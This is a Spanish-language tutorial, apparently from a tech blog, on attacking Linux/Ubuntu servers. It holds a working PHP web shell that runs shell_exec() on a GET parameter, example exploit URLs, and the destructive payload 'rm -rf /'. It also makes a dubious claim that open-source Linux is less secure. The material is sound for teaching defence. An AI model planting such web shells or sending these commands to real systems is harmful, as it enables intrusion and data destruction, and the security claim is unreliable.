Hackear el sistema operativo Linux: Más tutorial de ejemplo sobre Ubuntu

Hackear el sistema operativo Linux: tutorial completo con ejemplo sobre Ubuntu

Linux es el sistema operativo de servidor más utilizado, especialmente para servidores web. Es de código abierto lo que significa que cualquiera puede tener acceso a su código fuente.

Esto lo hace menos seguro en comparación con otros sistemas operativos, ya que los atacantes pueden estudiar el código fuente para encontrar vulnerabilidades.

Contenido pendiente de una última revisión.
Es posible que este tutorial no funcione en las últimas versiones de Ubuntu.

Introducción breve a Linux

Linux es un sistema operativo de código abierto. Existen muchas distribuciones de sistemas operativos basados en Linux como Redhat, Fedora y Ubuntu, etc. Si eres un principiante, quizás puedes probar con las mejores distros par principiantes en Unix.

A diferencia de otros sistemas operativos, Linux es menos seguro cuando se trata de seguridad. Esto se debe a que el código fuente está disponible libremente, por lo que es fácil estudiarlo en busca de vulnerabilidades y explotarlas en comparación con otros sistemas operativos que no son de código abierto.

Linux se puede utilizar como servidor, escritorio, tableta o sistema operativo de dispositivo móvil.

Los programas de Linux se pueden operar usando GUI o comandos. Los comandos de Linux para la piratería de Kali Linux son más efectivos y eficientes en comparación con el uso de la GUI. Por esta razón, ayuda conocer los comandos básicos de Linux para piratear.

Herramientas de piratería de Linux

  • Nessus: : esta herramienta se puede usar para hackear Ubuntu, escanear configuraciones, parches y redes, etc. se puede encontrar en https://www.tenable.com/products/nessus
  • NMap: Esta herramienta se puede utilizar para supervisar los hosts que se ejecutan en el servidor y los servicios que están utilizando. También se puede utilizar para buscar puertos. Se puede encontrar en https://nmap.org/
  • SARA: SARA es el acrónimo de Security Auditor’s Research Assistant. Como su nombre lo indica, esta herramienta se puede utilizar para auditar redes contra amenazas como SQL
  • injection, XSS, etc. se puede encontrar en http://www-arc.com/sara/sara.html

La lista anterior no es exhaustiva, solo da una idea de las herramientas disponibles para la piratería de Ubuntu y la piratería de sistemas Linux.

Cómo prevenir los hacks de Linux

Linux Hacking se aprovecha de las vulnerabilidades en el sistema operativo, una organización puede adoptar la siguiente política para protegerse contra tales ataques.

  • Administración de parches: los parches corrigen errores que los atacantes explotan para comprometer un sistema. Una buena política de administración de parches asegurará que aplique constantemente parches relevantes a su sistema.
  • Configuración adecuada del sistema operativo: otros exploits se aprovechan de las debilidades en la configuración del servidor. Los nombres de usuario y demonios inactivos deben deshabilitarse. Se debe cambiar la configuración predeterminada, como las contraseñas comunes de la aplicación, los nombres de usuario predeterminados y algunos números de puerto.
  • Sistema de detección de intrusos: estas herramientas se pueden utilizar para detectar el acceso no autorizado al sistema. Algunas herramientas tienen la capacidad de detectar y prevenir tales ataques.

Actividad de piratería: Hackear un sistema Ubuntu Linux usando PHP

En este escenario práctico, aprenderemos cómo hackear con Ubuntu y le proporcionaremos información básica sobre cómo puede usar PHP para comprometer un Linux. No vamos a apuntar a ninguna víctima.

Si deseas probarlo, puede instalar LAMPP en tu máquina local.

PHP viene con dos funciones que se pueden usar para ejecutar comandos de piratería de Linux. Tiene funciones exec() y shell_exec(). La función exec() devuelve la última línea de la salida del comando, mientras que la shell_exec() devuelve todo el resultado del comando como una cadena.

Para fines de demostración, supongamos que los administradores del atacante cargan el siguiente archivo en un servidor web.

<?php
$cmd = isset($_GET['cmd']) ? $_GET['cmd'] : 'ls -l';
echo "executing shell command:-> $cmd</br>";
$output = shell_exec($cmd);
echo "<pre>$output</pre>";
?>

El script anterior obtiene el comando de la variable GET denominada cmd. El comando se ejecuta utilizando shell_exec() y los resultados devueltos en el navegador.

El código anterior se puede explotar utilizando la siguiente URL:

http://localhost/cp/konsole.php?cmd=ls%20-l

  • “… konsole.php?cmd=ls%20-l” asignael valor ls –l a la variable cmd.

El comando en Ubuntu para hackear contra el servidor se ejecutará como:

shell_exec('ls -l') ;

El comando anterior simplemente muestra los archivos en el directorio actual y los permisos. Supongamos que el atacante pasa el siguiente comando.

rm -rf /
  • “rm” elimina los archivos
  • “rf” hace que el comando rm se ejecute en modo recursivo. Eliminación de todas las carpetas y archivos.
  • “/” indica al comando que comience a eliminar archivos del directorio raíz.

La URL del ataque se vería algo como esto:

http://localhost/cp/konsole.php?cmd=rm%20-rf%20/

Resumen

  • Linux es un sistema operativo popular para servidores, computadoras de escritorio, tabletas y dispositivos móviles.
  • Linux es de código abierto, y el código fuente puede ser obtenido por cualquier persona. Esto hace que sea fácil detectar las vulnerabilidades. Es uno de los mejores sistemas operativos para hackers.
  • Los comandos básicos y de piratería de redes en Ubuntu son valiosos para los piratas informáticos de Linux.
  • Las vulnerabilidades son una debilidad que puede ser explotada para comprometer un sistema.
  • Una buena seguridad puede ayudar a proteger un sistema de ser comprometido por un atacante.

? Libro Hacking desde 0


? Herramientas Hacking ? Recursos Hacking


?‍♀️ Cursos Seguridad en Red ? Cursos RedesCursos Servicios en Nube ?‍♂️ Libros Seguridad y Criptografía

Relacionado

ForEach de Javascript: Array para bucles

Como una de las estructuras de control básicas en la programación, los bucles son casi una adición diaria al código que escribimos. El bucle forEach clásico es uno de los primeros fragmentos de código que aprendemos a escribir como programadores. Si fueras un desarrollador de Javascript, sabrías que Javascript no es ajeno a la iteración a través de los elementos de una matriz o un mapa ¡SEGUIR LEYENDO!

10 Mejores alternativas de Sci-hub para descargar artículos de investigación gratis

Como sabemos, Sci-hub es un sitio web increíble con millones de artículos de investigación para todos los estudiantes universitarios y académicos. El sitio web de Sci-Hub se encarga de obtener los artículos de investigación y artículos de pago utilizando las credenciales que se filtran. La fuente de credenciales utilizada por este sitio web no está clara. Sin embargo, se supone que muchas de ellas son donadas, ¡SEGUIR LEYENDO!

10 Características Sorprendentes de Windows que Deberías Conocer en 2024

Aunque haya sido usuario de Windows durante décadas, el sistema operativo es tan amplio y complejo que siempre existen características útiles, pero menos conocidas, que podrían sorprenderte. En este sentido, he identificado diez funciones poco conocidas de Windows que pueden potenciar su eficiencia, comodidad e incluso su experiencia de uso lúdico en su PC.

¡REBAJADO!
Microsoft Surface Go 2 - Portátil 2 en 1 de 10.5 pulgadas Full HD, Wifi, Intel...
  • Procesador Dual-Core Intel Pentium Gold 4425Y (2...
  • Memoria RAM de 8 GB LPDDR3
  • Disco SSD de 128 GB
Todas estas características deberían ser compatibles tanto con Windows 10 ¡SEGUIR LEYENDO!

10 Criptomonedas con Potencial de Crecimiento de Futuro

El rumor en torno a las criptomonedas no se desvanece por mucho que existan grandes pesimistas alrededor de los malos rumores. Entonces, si consideras invertir en el mundo de las criptomonedas, deberías estar atento a las criptomonedas que se espera que tengan un buen desempeño para el resto de 2021. En los últimos tiempos, los tokens DeFi están recibiendo toda la atención y es más que ¡SEGUIR LEYENDO!

10 Empresas de robótica más importantes del mundo

Los cambios de paradigma revolucionarios debido a los desarrollos de la robótica en todo el mundo están generando nuevos puntos de vista en muchos sectores, entre ellos en los de la industria y la tecnología. Con la ayuda de la Inteligencia Artificial, la tecnología produce resultados innovadores cada segundo y el campo de la robótica define y reconfigura su uso a cada instante. Cada día que ¡SEGUIR LEYENDO!

10 Frameworks que los Desarrolladores de Software deberían Aprender 2024

Bienvenidos desarrolladores web y de software, estamos en los inicios de 2023 y es posible que muchos se esten planteado sus objetivos para lo largo del año. Con anterioridad ya he compartidos las rutas de aprendizaje para un desarrollador front-end, un desarrollador full-stack o un desarrollador back-end entre otros muchos contenidos más. En este artículo, me gustaría compartir algunos de los mejores frameworks y bibliotecas para ¡SEGUIR LEYENDO!

10 Repositorio de GitHub que todo Desarrollador Web debería conocer

GitHub es el lugar que debes buscar cuando intentas mejorar como desarrollador, toda la información que necesitas está disponible en algún repositorio que alguien ya se ha molestado en indexar. Sin embargo, la parte complicado es encontrar el repositorio más adecuado. Es fácil sentirse perdido en todos los repositorios disponibles dentro de GitHub. Para ayudarte, he elaborado una lista de 10 repositorios de GitHub que pueden ¡SEGUIR LEYENDO!